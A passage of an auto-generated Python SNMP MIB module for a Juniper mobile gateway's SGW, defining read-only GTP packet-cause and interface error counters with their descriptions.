if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsLclDetTx.setDescription('Number of GTP packets sent with cause Local Detach.')
jnxMbgSgwPPGtpV2ICsCmpDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 174), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCmpDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCmpDetRx.setDescription('Number of GTP packets received with cause Complete Detach.')
jnxMbgSgwPPGtpV2ICsCmpDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 175), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCmpDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCmpDetTx.setDescription('Number of GTP packets sent with cause Complete Detach.')
jnxMbgSgwPPGtpV2ICsRATChgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 176), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRATChgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRATChgRx.setDescription('Number of GTP packets received with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwPPGtpV2ICsRATChgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 177), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRATChgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRATChgTx.setDescription('Number of GTP packets sent with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwPPGtpV2ICsISRDeactRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 178), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsISRDeactRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsISRDeactRx.setDescription('Number of GTP packets received with cause ISR Deactivated.')
jnxMbgSgwPPGtpV2ICsISRDeactTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 179), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsISRDeactTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsISRDeactTx.setDescription('Number of GTP packets sent with cause ISR Deactivated.')
jnxMbgSgwPPGtpV2ICsEIFRNCEnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 180), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsEIFRNCEnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsEIFRNCEnRx.setDescription('Number of GTP packets received with cause Error Indication from RNC eNodeB.')
jnxMbgSgwPPGtpV2ICsEIFRNCEnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 181), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsEIFRNCEnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsEIFRNCEnTx.setDescription('Number of GTP packets sent with cause Error Indication from RNC eNodeB.')
jnxMbgSgwPPGtpV2ICsSemErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 182), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSemErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSemErTADRx.setDescription('Number of GTP packets received with cause Semantic Error in TAD Operation.')
jnxMbgSgwPPGtpV2ICsSemErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 183), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSemErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSemErTADTx.setDescription('Number of GTP packets sent with cause Semantic Error in TAD Operation.')
jnxMbgSgwPPGtpV2ICsSynErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 184), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSynErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSynErTADRx.setDescription('Number of GTP packets received with cause Syntactic Error in TAD Operation.')
jnxMbgSgwPPGtpV2ICsSynErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 185), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSynErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsSynErTADTx.setDescription('Number of GTP packets sent with cause Syntactic Error in TAD Operation.')
jnxMbgSgwPPGtpV2ICsRMValRcvRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 186), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRMValRcvRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRMValRcvRx.setDescription('Number of GTP packets received with cause Reserved Message Value Received.')
jnxMbgSgwPPGtpV2ICsRMValRcvTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 187), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRMValRcvTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRMValRcvTx.setDescription('Number of GTP packets sent with cause Reserved Message Value Received.')
jnxMbgSgwPPGtpV2ICsRPrNtRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 188), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRPrNtRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRPrNtRspRx.setDescription('Number of GTP packets received with cause Remote peer not responding.')
jnxMbgSgwPPGtpV2ICsRPrNtRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 189), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRPrNtRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsRPrNtRspTx.setDescription('Number of GTP packets sent with cause Remote peer not responding.')
jnxMbgSgwPPGtpV2ICsColNWReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 190), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsColNWReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsColNWReqRx.setDescription('Number of GTP packets received with cause Collision with network initiated request.')
jnxMbgSgwPPGtpV2ICsColNWReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 191), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsColNWReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsColNWReqTx.setDescription('Number of GTP packets sent with cause Collision with network initiated request.')
jnxMbgSgwPPGtpV2ICsUnPgUESusRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 192), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnPgUESusRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnPgUESusRx.setDescription('Number of GTP packets received with cause Unable to page UE due to suspension.')
jnxMbgSgwPPGtpV2ICsUnPgUESusTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 193), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnPgUESusTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsUnPgUESusTx.setDescription('Number of GTP packets sent with cause Unable to page UE due to suspension.')
jnxMbgSgwPPGtpV2ICsInvTotLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 194), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvTotLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvTotLenRx.setDescription('Number of GTP packets received with cause Invalid total len.')
jnxMbgSgwPPGtpV2ICsInvTotLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 195), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvTotLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvTotLenTx.setDescription('Number of GTP packets sent with cause Invalid total len.')
jnxMbgSgwPPGtpV2ICsDtForNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 196), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDtForNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDtForNtSupRx.setDescription('Number of GTP packets received with cause Data forwarding not supported.')
jnxMbgSgwPPGtpV2ICsDtForNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 197), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDtForNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsDtForNtSupTx.setDescription('Number of GTP packets sent with cause Data forwarding not supported.')
jnxMbgSgwPPGtpV2ICsInReFRePrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 198), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInReFRePrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInReFRePrRx.setDescription('Number of GTP packets received with cause Invalid Reply from Remote peer.')
jnxMbgSgwPPGtpV2ICsInReFRePrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 199), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInReFRePrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInReFRePrTx.setDescription('Number of GTP packets sent with cause Invalid Reply from Remote peer.')
jnxMbgSgwPPGtpV2ICsInvPrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 200), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvPrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvPrRx.setDescription('Number of GTP packets received with cause Invalid peer.')
jnxMbgSgwPPGtpV2ICsInvPrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 201), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvPrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvPrTx.setDescription('Number of GTP packets sent with cause Invalid peer.')
jnxMbgSgwPPGtpV1ProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 202), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ProtocolErrRx.setDescription('Number of GTPv1 Protocol Errors Received.')
jnxMbgSgwPPGtpV1UnSupMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 203), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1UnSupMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1UnSupMsgRx.setDescription('Number of GTPv1 Unsupported Messages received.')
jnxMbgSgwPPGtpV1T3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 204), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1T3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1T3RespTmrExpRx.setDescription('Number of GTP V1 T3 timer expiries Received.')
jnxMbgSgwPPGtpV1EndMarkerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 205), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EndMarkerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EndMarkerRx.setDescription('Number of GTP V1 end marker packets received.')
jnxMbgSgwPPGtpV1EndMarkerTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 206), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EndMarkerTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EndMarkerTx.setDescription('Number of GTP V1 end marker packets sent.')
jnxMbgSgwPPGtpV1EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 207), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoReqRx.setDescription('Number of GTP V1 echo request packets received.')
jnxMbgSgwPPGtpV1EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 208), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoReqTx.setDescription('Number of GTP iV1 echo request packets sent.')
jnxMbgSgwPPGtpV1EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 209), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoRespRx.setDescription('Number of GTP V1 echo response packets received.')
jnxMbgSgwPPGtpV1EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 210), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1EchoRespTx.setDescription('Number of GTP V1 echo response packets sent.')
jnxMbgSgwPPGtpV1ErrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 211), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ErrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ErrIndRx.setDescription('Number of GTP V1 Error Indication packets received.')
jnxMbgSgwPPGtpV1ErrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 212), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ErrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV1ErrIndTx.setDescription('Number of GTP V1 Error Indication packets sent.')
jnxMbgSgwPPSuspNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 213), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPSuspNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPSuspNotifRx.setDescription('Number of GTPv2 Suspend Notification messages received.')
jnxMbgSgwPPSuspNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 214), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPSuspNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPSuspNotifTx.setDescription('Number of GTPv2 Suspend Notification messages sent.')
jnxMbgSgwPPSuspAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 215), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPSuspAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPSuspAckRx.setDescription('Number of GTPv2 Suspend Acknowledgement messages received.')
jnxMbgSgwPPSuspAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 216), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPSuspAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPSuspAckTx.setDescription('Number of GTPv2 Suspend Acknowledgement messages sent.')
jnxMbgSgwPPResumeNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 217), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPResumeNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPResumeNotifRx.setDescription('Number of GTPv2 Resume Notification messages received.')
jnxMbgSgwPPResumeNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 218), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPResumeNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPResumeNotifTx.setDescription('Number of GTPv2 Resume Notification messages sent.')
jnxMbgSgwPPResumeAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 219), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPResumeAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPResumeAckRx.setDescription('Number of GTPv2 Resume Acknowledgement messages received.')
jnxMbgSgwPPResumeAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 220), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPResumeAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPResumeAckTx.setDescription('Number of GTPv2 Resume Acknowledgement messages sent.')
jnxMbgSgwPPPiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 221), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPiggybackMsgRx.setDescription('Number of GTPv2 Piggyback messages received.')
jnxMbgSgwPPPiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 222), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPiggybackMsgTx.setDescription('Number of GTPv2 S11 Piggyback messages sent.')
jnxMbgSgwGtpIfStatsTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4), )
if mibBuilder.loadTexts: jnxMbgSgwGtpIfStatsTable.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpIfStatsTable.setDescription('Each entry corresponds to an interface level GTP statistic.')
jnxMbgSgwGtpIfStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1), ).setIndexNames((0, "JUNIPER-MOBILE-GATEWAYS", "jnxMbgGwIndex"), (0, "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwIfIndex"))
if mibBuilder.loadTexts: jnxMbgSgwGtpIfStatsEntry.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpIfStatsEntry.setDescription('A specification of the GTP interface level control Statistics.')
jnxMbgSgwIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 1), Unsigned32())
if mibBuilder.loadTexts: jnxMbgSgwIfIndex.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfIndex.setDescription('GTP Interface Index')
jnxMbgSgwIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfType.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfType.setDescription('Interface Name.')
jnxMbgSgwIfRxPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRxPacketsDropped.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRxPacketsDropped.setDescription('Number of Received GTP Packets Dropped by the Gateway.')
jnxMbgSgwIfPacketAllocFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPacketAllocFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPacketAllocFail.setDescription('Number of Packet allocation failures in the Gateway.')
jnxMbgSgwIfPacketSendFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPacketSendFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPacketSendFail.setDescription('Number of GTP Packet Send failures in the Gateway.')
jnxMbgSgwIfIPVerErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfIPVerErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfIPVerErrRx.setDescription('Number of IP Version Error Packets Received.')
jnxMbgSgwIfIPProtoErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfIPProtoErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfIPProtoErrRx.setDescription('Number of IP Protocol Error packets Received.')
jnxMbgSgwIfGTPPortErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGTPPortErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGTPPortErrRx.setDescription('Number of Port Error Packets Received.')
jnxMbgSgwIfGTPUnknVerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGTPUnknVerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGTPUnknVerRx.setDescription('Number of Unknown Version Packets Received.')
jnxMbgSgwIfPcktLenErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPcktLenErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPcktLenErrRx.setDescription('Number of Packet Length Error Packets Received.')
jnxMbgSgwIfUnknMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUnknMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUnknMsgRx.setDescription('Number of Unknown Messages Received.')
jnxMbgSgwIfProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfProtocolErrRx.setDescription('Number of GTPv2 Protocol Errors Received.')
jnxMbgSgwIfUnSupportedMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUnSupportedMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUnSupportedMsgRx.setDescription('Number of GTPv2 Unsupported Messages received.')
jnxMbgSgwIfT3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfT3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfT3RespTmrExpRx.setDescription('Number of GTP V2 T3 timer expiries Received.')
jnxMbgSgwIfV2NumMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumMsgRx.setDescription('Number of GTPv2 messages received.')
jnxMbgSgwIfV2NumMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumMsgTx.setDescription('Number of V2 messages sent.')
jnxMbgSgwIfV2NumBytesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 17), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumBytesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumBytesRx.setDescription('Number of GTPv2 bytes received.')
jnxMbgSgwIfV2NumBytesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 18), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumBytesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2NumBytesTx.setDescription('Number of V2 bytes sent.')
jnxMbgSgwIfV2EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 19), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoReqRx.setDescription('Number of GTP V2 Echo Request received.')
jnxMbgSgwIfV2EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 20), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoReqTx.setDescription('Number of GTP V2 Echo Request Sent.')
jnxMbgSgwIfV2EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 21), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoRespRx.setDescription('Number of GTP V2 Echo Response received.')
